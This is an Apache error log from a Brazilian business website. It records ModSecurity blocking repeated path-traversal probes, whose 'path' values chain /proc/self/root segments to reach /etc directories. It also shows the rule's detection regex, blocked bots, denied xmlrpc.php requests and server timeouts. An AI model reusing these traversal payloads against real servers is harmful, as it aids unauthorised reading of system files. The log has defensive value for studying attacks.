[Thu Mar 19 11:59:22.097278 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:55274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwPSsdf6f5d65gmYZSAGwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:59:24.157281 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55068] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:59:55.149317 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:00:25.799724 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.228.61:53236] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwPifu8EFLIOrSqIpuv2gAAAkQ"]
[Thu Mar 19 12:00:27.137939 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56746] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:00:58.076031 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:01:22.041091 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:01:40.685521 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.244.43:34032] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwP1F_V7PWP6ixUYl7E5wAAAo4"]
[Thu Mar 19 12:01:45.137856 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58788] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:02:04.683772 2026] [access_compat:error] [pid 27403:tid 140411599251200] [client 195.123.216.134:41418] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:02:07.161115 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:02:27.651082 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:35406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQAxkFeYa1D6dYQnD5xwAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:02:28.125803 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:02:34.222861 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:49304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQCV_V7PWP6ixUYl7FEAAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 12:02:45.082321 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:60266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQFV_V7PWP6ixUYl7FJAAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:02:50.121793 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60512] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:02:57.136032 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:39074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQIMdf6f5d65gmYZSAvAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:02:58.630612 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:34948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQIvu8EFLIOrSqIpuwVAAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:01.004532 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:34954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQJV_V7PWP6ixUYl7FKgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:03.387002 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:34960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQJ-yqAr6etmhZHNpo6wAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:06.122734 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:34964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQKta6ubjKNq_cu4ZeiwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:07.881269 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.243.128:45890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQK_-YZRR_7pZ7nDKULAAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:10.352571 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:50386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQLvu8EFLIOrSqIpuwWgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:14.125789 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:32882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:03:14.632942 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:50394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQMgkwaGbbGflqUZDNUQAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:17.207542 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:50410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQNda6ubjKNq_cu4ZekAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:19.462661 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:34896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQN_u8EFLIOrSqIpuwYwAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:22.292215 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:38100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQOuyqAr6etmhZHNppBAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:03:26.869417 2026] [access_compat:error] [pid 27293:tid 140411674785536] [client 109.70.100.11:50632] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:03:37.132131 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:03:42.393055 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:38100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQTuyqAr6etmhZHNppDwAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:03:55.516481 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:41260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQW-yqAr6etmhZHNppHQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:03:59.127259 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34002] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:04:07.093396 2026] [core:alert] [pid 26799:tid 140411716749056] [client 57.141.18.120:37140] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:04:14.043840 2026] [access_compat:error] [pid 30077:tid 140411590858496] [client 179.61.228.159:25543] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:04:22.133216 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34592] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:04:26.314119 2026] [core:alert] [pid 17887:tid 140411548894976] [client 57.141.18.88:37722] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:04:29.582769 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:37238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQfQkwaGbbGflqUZDNxwAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:04:34.752679 2026] [core:alert] [pid 17887:tid 140411607643904] [client 57.141.18.56:37954] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:04:38.364012 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:48586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQhl_V7PWP6ixUYl7FUQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:04:41.434853 2026] [access_compat:error] [pid 17653:tid 140411582465792] [client 172.94.28.3:55317] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
